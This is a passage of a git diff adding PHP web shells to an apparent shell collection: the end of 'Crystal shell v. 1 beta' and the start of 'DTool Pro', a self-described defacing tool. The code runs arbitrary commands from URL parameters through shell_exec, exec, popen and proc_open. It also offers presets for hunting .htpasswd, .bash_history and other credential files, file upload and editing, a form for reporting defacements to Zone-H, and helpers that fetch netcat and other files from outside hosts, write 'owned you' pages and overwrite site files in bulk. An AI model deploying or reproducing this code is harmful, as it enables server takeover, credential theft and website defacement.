+		find config* files</option><option value="find . -type f -name &quot;config*&quot;">
+		find config* files in current dir</option><option value="find / -perm -2 -ls">
+		find all writable directories and files</option><option value="find . -perm -2 -ls">
+		find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd">
+		find all service.pwd files</option><option value="find . -type f -name service.pwd">
+		find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">
+		find all .htpasswd files</option><option value="find . -type f -name .htpasswd">
+		find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">
+		find all .bash_history files</option><option value="find . -type f -name .bash_history">
+		find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">
+		find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">
+		find .fetchmailrc files in current dir</option><option value="lsattr -va">
+		list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">
+		show opened ports</option></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr></TABLE><a bookmark="minipanel" href="?act=bind"><font face="Verdana" size="-2">Bind port to</font><font face="Webdings" size="5" color="#DCE7EF">Â</font></a><font color="#00FF00"><br>
+</font>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST">
+	<p align="center">
+<a bookmark="minipanel">
+	<b><font face="verdana" color="red" size="4">
+	<a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel">
+	<font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="2">Edit/Create
+	file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><font face="Wingdings 2" size="2">&quot;</font></p><p align="center">
+	&nbsp;<?
+if ($act == "edit") {echo "<center><b>ÇáÊÍÑíÑ æÇáÇäÔÇÁ:<br><br> Þã ÈæÖÚ ÇÓã ÇáãáÝ ÇáÐí ÊÑíÏ ÊÍÑíÑå ÝÞØ<br>æÈÚÏ ÐÇáß ÇáÖÛØ Úáì config.php ãËÇá<br>Edit<br>ÓÊÙåÑ áß äÇÝÐå ÈåÇ ãÍÊæíÇÊ ÇáãáÝ <br>æÇíÖÇ ð ÇÐÇ ÇÑÏÊ ÇäÔÇÁ ãáÝ ÝÞØ ÖÚ ÇÓãå ãÚ ÇáÇãÊÏÇÏ <br>æÈÚÏ ÐÇáß ÇßÊÈ ãÇÊÑíÏ washer-crystal.txt   </a>.</b>";}
+?>
+	</p>
+	<p>&nbsp;</p>
+	<p>	<?
+	echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+File to edit:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+?>
+	</p>
+	</form></center></p></td>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+                 <?
+if ($act == "upload") {echo "<center><b>ÑÝÚ ÇáãáÝÇÊ:<br><br>Þã ÈÊÍÏíÏ ÇáãáÝ ÇáãÑÇÏ ÑÝÚå <br>æÈÚÏ ÐÇáß Þã ÈÇáÖÛØ Úáì ÇáÎíÇÑ ÇáãæÖÍ<br>UPLOAD< </a>.</b>";}
+?><a bookmark="minipanel"><b><font size="2">::
+	</font>
+	</b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="2">
+					upload</font></span></a><b><font size="2">::</font></b><font face=Webdings size=2>&#325;</font><font size="2"></a></a></font><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">&nbsp;
+		<?
+		echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<INPUT type=\"file\" name=\"userfile\">
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Download\"></form></div>";
+?>
+	<p></form></p></td>
+
+</tr>
+</table>	<b>
+<font size=-2 face=verdana color="white">
+                  <p>&nbsp;<a href="?act=Defacer">Defacer Zone-H</a></font><p align="center">&nbsp;
+</p>
+ 					<?
+if ($act == "Defacer") {echo "<center><b>CRYSTAL-H:<br><br>ÇÓã ÇáãÚáä Defacer<br>ÇáãæÞÚ ÇáãÎÊÑÞ Victim<br>æÖÚ ÇáÇÎÊÑÇÞ Çí äæÚ ÇáËÛÑå ÇáÊì ÇÓÊËãÑÊåÇ Attack Mode <br> ÓÈÈ ÇáÇÎÊÑÇÞ Attack Reason <br>áÇÑÓÇá ÇáÇÎÊÑÇÞ sand   <br> áÑÄíå ÇÎÑ ÇáÊÍÐíÑÇÊ ÇáãÑÓáå ÈÇáãæÞÚ Attacks On Hold</a>.</b>";}
+?>                 <p align="center"><font face="Verdana" color="#CC0000">
+                  <SCRIPT language=JavaScript type=text/javascript>
+        <!--
+        function validate(){
+            document.notifyForm.action = "http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/"
+            document.notifyForm.submit();
+        }
+        //-->
+        </SCRIPT>
+
+                  Defacer </font></font></font>
+<font face=Verdana color=#CC0000>
+					Zone-h</font><FORM name=notifyForm
+                  action=http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/
+                  method=post>
+                  <TABLE class=contentpane cellSpacing=0 cellPadding=0
+                  width="100%" border=0>
+                    <TBODY>
+                    <!-- DESCRIPTION -->
+                    <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                      <TD style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"></TD></TR><!-- INSTRUCTIONS -->
+                    </TBODY></TABLE>
+                  <TABLE cellSpacing=0 cellPadding=10 width="100%" border=0 style="color: #CC0000; border: 1px outset #000000; background-color: #000000">
+                    <TBODY>
+                    <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                      <TD align=left style="color: #DCE7EF; border: 1px solid #FFFFFF; background-color: #000000" bgcolor="#000000" bordercolorlight="#000000" bordercolordark="#000000">
+                        <TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
+                              align=left><SPAN
+                              style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><!-- Input Form --><TABLE class=notifyForm width="100%">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left width="15%"
+                              height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"><b><font size="1" color="#FF0000">
+							::Defacer::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<INPUT
+                              class=inputbox id=defacer style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
+                              maxLength=64 name=defacer size="1" value="Super-Crystal"> </font></font>
+							</font></TD>
+							<font size=-2 face=verdana color=white>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b><font size="1" color="#FF0000">::Victim::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<INPUT
+                              class=inputbox id=domain style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
+                              maxLength=250 value=http://www.microsoft.com name=domain size="1"> </TD>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b>
+							<font color="#FF0000" size="1">Attack Mode</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<SELECT class=inputbox
+                              style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=method size="1"> <OPTION
+                                value="" selected>choose</OPTION> <OPTION
+                                value=23>Access credentials through Man In the
+							Middle attack</OPTION><OPTION value=22>Attack
+							against the administrator/user (password
+							stealing/sniffing)</OPTION><OPTION value=29>DNS
+							attack through cache poisoning</OPTION><OPTION
+                                value=28>DNS attack through social engineering</OPTION><OPTION value=17>
+							File Inclusion</OPTION><OPTION value=9>FTP Server
+							intrusion</OPTION><OPTION value=8>Mail Server
+							intrusion</OPTION><OPTION value=30>Not available</OPTION><OPTION value=14>
+							Other Server intrusion</OPTION><OPTION value=18>
+							Other Web Application bug</OPTION><OPTION value=19>
+							Remote administrative panel access through
+							bruteforcing</OPTION><OPTION value=20>Remote
+							administrative panel access through password
+							guessing</OPTION><OPTION value=21>Remote
+							administrative panel access through social
+							engineering</OPTION><OPTION value=25>Remote service
+							password bruteforce</OPTION><OPTION
+                                value=24>Remote service password guessing</OPTION><OPTION value=26>
+							Rerouting after attacking the Firewall</OPTION><OPTION
+                                value=27>Rerouting after attacking the Router</OPTION><OPTION value=12>
+							RPC Server intrusion</OPTION><OPTION value=13>Shares
+							misconfiguration</OPTION><OPTION value=15>SQL
+							Injection</OPTION><OPTION value=10>SSH Server
+							intrusion</OPTION><OPTION value=11>Telnet Server
+							intrusion</OPTION><OPTION value=16>URL Poisoning</OPTION><OPTION value=7>
+							Web Server external module intrusion</OPTION><OPTION
+                                value=6>Web Server intrusion</OPTION></SELECT></TD></TR><TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<b>
+							<font size="1" color="#FF0000">Attack Reason</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1">è</font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
+							<SELECT class=inputbox
+                              style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=reason size="1"> <OPTION
+                                value="" selected>choose</OPTION> <OPTION
+                                value=4>As a challenge</OPTION><OPTION
+                                value=1>Heh...just for fun!</OPTION><OPTION
+                                value=5>I just want to be the best defacer</OPTION><OPTION value=7>
+							Not available</OPTION><OPTION
+                                value=6>Patriotism</OPTION><OPTION
+                                value=3>Political reasons</OPTION><OPTION
+                                value=2>Revenge against that website</OPTION></SELECT></TD></TR></TBODY></TABLE><TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
+                              align=left><SPAN
+                              style="FONT-SIZE: 4px">&nbsp;</SPAN></TD></TR></TBODY></TABLE><DIV style="CLEAR: both"></DIV>
+                        <TABLE class=notifyForm width="100%">
+                          <TBODY>
+                          <TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
+                            <TD align=left style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa" bgcolor="#000000">
+							<INPUT class=button onclick=validate() type=button value=Send name=send style="color: #CC0000; border: 1px solid #C0C0C0; background-color: #EEEEEE">&nbsp;&nbsp;<b><font size=4 face="Wingdings 3">:</font></b>&nbsp;&nbsp;
+							</font></font>
+<font size=6 face=Webdings color="#FF0000">L </font><b>
+							<a class="sublevel" href="http://www.zone-h.org/component/option,com_attacks/Itemid,45/">
+							<font color="#FF0000">Attacks On Hold</font></a></b><font color="#FF0000">
+							</font>
+<font size=6 face=Webdings color="#FF0000">L</TD></TR></TBODY></TABLE><INPUT type=hidden
+                        value=com_notify name=option style="font-family: Verdana; font-size: 10px; color: black; border: 2px solid black; background-color: #C0C0C0"></TR></TBODY></TABLE></FORM></font></b><br>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+	<b>
+	&nbsp;</b><font face="Wingdings 3" size="5">y</font><b>Crystal shell v. 1 beta&nbsp; </b><font color="#CC0000"><b>©oded by</b> </font><b><a href="http://www.tryag.com">TrYaG Team</a> <span lang="en-us">l</span></b> <b><a href="?act=team">Arab Security Center Team</a> |<a href="http://www.secure4center.com"><font color="#DCE7EF">securityCenter</font></a>|
+	: Web </b><font face="Wingdings 3" size="5">x</font></p><p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+<div align="right">
+
+<span lang="en-us">&nbsp; </span><TABLE cellSpacing=0 cellPadding=0 border=0>
+  <TBODY>
+  <TR>
+    <TD align=middle style="font-family: verdana, arial, 'ms sans serif', sans-serif; font-size: 11px; color: #D5ECF9">
+      <TABLE class=calendar_table cellSpacing=1 cellPadding=1>
+        <TBODY>
+        <TR>
+          <TD class=calendar_month colSpan=7><span lang="en-us">CRYSTAL-<font color="#CC0000">H</font></span><font color="#CC0000">
+			2006</font></TD></TR><TR>
+          <TD class=calendar_days>P</TD><TD class=calendar_days>P</TD><TD class=calendar_days>S</TD><TD class=calendar_days>C</TD><TD class=calendar_days>P</TD><TD class=calendar_days>C</TD><TD class=calendar_days>C</TD></TR><TR>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD></TR>
+        <TR>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day>1 </TD></TR>
+        <TR>
+          <TD class=calendar_day>2 </TD>
+          <TD class=calendar_day>3 </TD>
+          <TD class=calendar_day><font color="#FF0000">4 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">5 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">6 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">7 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">8 </font> </TD></TR>
+        <TR>
+          <TD class=calendar_day>9 </TD>
+          <TD class=calendar_day><font color="#FF0000">10 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">11 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">12 </font> </TD>
+          <TD class=calendar_day>13</TD><TD class=calendar_day>14 </TD>
+          <TD class=calendar_day>15 </TD></TR>
+        <TR>
+          <TD class=calendar_day><font color="#FF0000">16 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">17 </font> </TD>
+          <TD class=calendar_day><font color="#FF0000">18</font></TD><TD class=calendar_day>19</TD><TD class=calendar_day>20 </TD>
+          <TD class=calendar_day>21 </TD>
+          <TD class=calendar_current_day>22 </TD></TR>
+        <TR>
+          <TD class=calendar_day>23</TD><TD class=calendar_day>24</TD><TD class=calendar_day>25</TD><TD class=calendar_day>26</TD><TD class=calendar_day><font color="#FF0000">27</font></TD><TD class=calendar_day><font color="#FF0000">28</font></TD><TD class=calendar_day><font color="#FF0000">29</font></TD></TR><TR>
+          <TD class=calendar_day>30</TD><TD class=calendar_day>31</TD><TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD>
+          <TD class=calendar_day></TD></TR></TBODY></TABLE></TD></TR>
+  </TBODY></TABLE>
+
+        </div>
+
+
+</body></html>
diff --git a/xakep-shells/PHP/DTool Pro.php.txt b/xakep-shells/PHP/DTool Pro.php.txt
new file mode 100644
index 0000000..0799e5e
--- /dev/null
+++ b/xakep-shells/PHP/DTool Pro.php.txt	
@@ -0,0 +1,198 @@
+<?php
+
+if(empty($chdir)) $chdir = @$_GET['chdir'];
+if(empty($cmd)) $cmd = @$_GET['cmd'];
+if(empty($fu)) $fu = @$_GET['fu'];
+if(empty($list)) $list = @$_GET['list'];
+
+if(empty($chdir) or $chdir=='') $chdir=getcwd();
+$cmd = stripslashes(trim($cmd));
+
+
+//CHDIR tool
+if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
+	$boom = explode(" ",$cmd,2);
+	$boom2 = explode(";",$boom['1'], 2);
+	$toDir = $boom2['0'];
+
+	if($boom['1']=="/")$chdir="";
+	else if(strpos($cmd, 'chdir ..')!==false){
+		$cadaDir = array_reverse(explode("/",$chdir));
+
+		if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
+		else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
+		$toDir = str_replace($lastDir,"",$chdir);
+		if($toDir=="/")$chdir="";
+	}
+	else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
+	else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();
+
+	if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
+	if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
+	else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
+	else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
+	if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
+	if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
+}
+if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
+$cmdShow = $cmd;
+
+//To keep the changes in the url, when using the 'GET' way to send php variables
+if(empty($post)){
+	if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
+	if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
+	if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
+}
+
+//INFO table (pro and normal)
+if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
+if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
+if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
+if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
+if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
+if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
+$safe = @ini_get($safemode);
+if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
+$pro8 = "<i>PHP </i>".phpversion();
+$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
+$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
+$ip=@gethostbyname($_SERVER['HTTP_HOST']);
+
+//Turns the 'ls' command more usefull, showing it as it looks in the shell
+if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
+else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
+else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
+else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
+else if($cmd=='ls') $cmd = "ls -F";
+
+//If there are some '//' in the cmd, its now removed
+if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
+?>
+<body onload="focar();">
+<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
+.infop{font-family: verdana; font-size: 10px; color:#000000;}
+.infod{font-family: verdana; font-size: 10px; color:#414978;}
+.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
+.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
+<script>
+function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
+function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
+function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
+function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
+function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
+function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
+function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
+function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
+function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
+function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
+</script>
+<table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
+<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
+<font size=3>by r3v3ng4ns - revengans@gmail.com </font>
+</b></div></td></tr>
+<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
+<?php
+ $uname = @posix_uname();
+ while (list($info, $value) = each ($uname)) { ?>
+<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
+<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
+<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
+<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
+<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
+<? if($chdir!=getcwd()){?>
+<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
+<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
+</DIV></TD></TR></TABLE></td></tr>
+<tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
+<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
+<td width="75"><DIV class="algod">command</DIV></td>
+<td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
+<script>
+function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
+</script>
+</td></tr></table><table><tr><td>
+<?php
+ob_start();
+if(isset($chdir)) @chdir($chdir);
+function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
+function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
+function shell($what){echo(shell_exec($what));}
+function popenn($what){
+	$handle=popen("$what", "r");
+	$out=@fread($handle, 2096);
+	echo $out;
+	@pclose($handle);
+}
+function execc($what){
+	exec("$what",$array_out);
+	$out=implode("\n",$array_out);
+	echo $out;
+}
+function procc($what){
+	//na sequencia: stdin, stdout, sterr
+	if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
+	$process = @proc_open("$what",$descpec,$pipes);
+	if (is_resource($process)) {
+		fwrite($pipes[0], "");
+		fclose($pipes[0]);
+
+		while(!feof($pipes[2])) {
+			$erro_retorno = fgets($pipes[2], 4096);
+			if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
+		}
+    		fclose($pipes[2]);
+
+		while(!feof($pipes[1])) {
+			echo fgets($pipes[1], 4096);
+		}
+		fclose($pipes[1]);
+
+		$ok_p_fecha = @proc_close($process);
+	}else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
+}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
+}
+
+$funE="function_exists";
+if($safe){$fe="safemode";$feshow=$fe;}
